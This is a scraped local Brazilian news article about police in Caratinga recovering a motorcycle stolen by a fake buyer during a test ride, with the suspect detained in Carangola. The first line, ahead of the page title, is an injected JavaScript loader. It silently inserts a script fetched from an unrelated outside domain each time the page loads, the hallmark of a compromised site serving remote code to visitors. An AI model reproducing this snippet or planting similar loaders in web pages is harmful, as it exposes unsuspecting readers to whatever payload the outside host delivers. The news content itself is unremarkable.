;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); PC de Caratinga recupera moto em Carangola. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

PC de Caratinga recupera moto em Carangola.

furto_motoCARANGOLA (MG) – A Polícia Civil de Minas Gerais, por meio da Delegacia Regional de Caratinga, recuperou nesta terça-feira (02/08), na cidade de Carangola, a motocicleta furtada no mês passado em Caratinga. Foi detido Marco Antônio de Souza Alamínio, de 26 anos.

Segundo investigado pela Polícia Civil, o suspeito é denunciado por diversos golpes do tipo na região. A motocicleta furtada em Caratinga já havia sido repassada para terceiros e estava numa roça.

A investigação foi comandada pelo delegado Almir Lugon e contou com o subsídio dos investigadores Cristiano, Samuel Gouvea e Pacheco. Mais detalhes sobre a prisão e apreensão da motocicleta estão previstos para serem repassados à imprensa nesta quarta-feira.

FURTO

O fato aconteceu em frente a um restaurante às margens da BR 116, em Caratinga. Câmeras de segurança flagraram. Nas imagens o falso comprador, o homem de boné, aparece chegando a pé para a suposta compra com ao proprietário de uma motocicleta Tornado, de cor amarela.

Segundo relatos do proprietário do veículo, Dioni Magela de Mello, o suposto comprador pediu para dar uma volta na motocicleta, mostrando-se muito interessado na compra. O indivíduo saiu com a moto sentido a Santa Rita de Minas e não mais retornou. Ainda de acordo com o dono da moto, a ligação feita anteriormente para o encontro da negociação foi feita de um número confidencial.

Informação e foto: Portal Caparaó

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.